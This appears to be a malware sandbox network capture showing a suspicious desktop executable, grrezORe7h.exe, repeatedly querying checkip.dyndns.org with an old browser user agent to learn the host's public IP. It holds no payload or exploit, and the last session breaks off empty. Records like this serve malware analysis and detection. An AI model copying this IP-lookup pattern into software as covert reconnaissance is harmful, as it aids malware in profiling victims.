                                                                                                                    Jan 11, 2025 07:24:07.400283098 CET127OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Jan 11, 2025 07:24:07.587101936 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:07 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    1192.168.2.449816193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:08.688849926 CET127OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Jan 11, 2025 07:24:09.336906910 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:09 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    2192.168.2.449826193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:10.294660091 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:10.950201035 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:10 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    3192.168.2.449838193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:11.963365078 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:12.607991934 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:12 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    4192.168.2.449851193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:13.507854939 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:14.137198925 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:14 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    5192.168.2.449862193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:14.980933905 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:15.616818905 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:15 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    6192.168.2.449879193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:16.759533882 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:17.406584978 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:17 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.449891193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:18.328382969 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:18.954214096 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:18 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.449903193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:19.921390057 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:20.544184923 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:20 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.449915193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:21.394246101 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:22.039782047 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:21 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.449927193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:22.953865051 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:23.591645956 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:23 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.449939193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:24.588469982 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:25.233091116 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:25 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.449951193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:26.138719082 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:26.784008026 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:26 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.449963193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:27.625197887 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:28.274966002 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:28 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    14192.168.2.449975193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:29.314448118 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:29.942653894 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:29 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    15192.168.2.449987193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:30.799271107 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:31.444658995 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:31 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    16192.168.2.449999193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:32.459240913 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:33.106791973 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:33 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    17192.168.2.450011193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:34.080444098 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:34.716219902 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:34 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    18192.168.2.450024193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:35.674964905 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:36.315814018 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:36 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    19192.168.2.450038193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    Jan 11, 2025 07:24:37.271446943 CET151OUTGET / HTTP/1.1
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                                    Host: checkip.dyndns.org
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Jan 11, 2025 07:24:37.912435055 CET273INHTTP/1.1 200 OK
                                                                                                                    Date: Sat, 11 Jan 2025 06:24:37 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 104
                                                                                                                    Connection: keep-alive
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Pragma: no-cache
                                                                                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                    Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    20192.168.2.450045193.122.6.168807776C:\Users\user\Desktop\grrezORe7h.exe
                                                                                                                    TimestampBytes transferredDirectionData
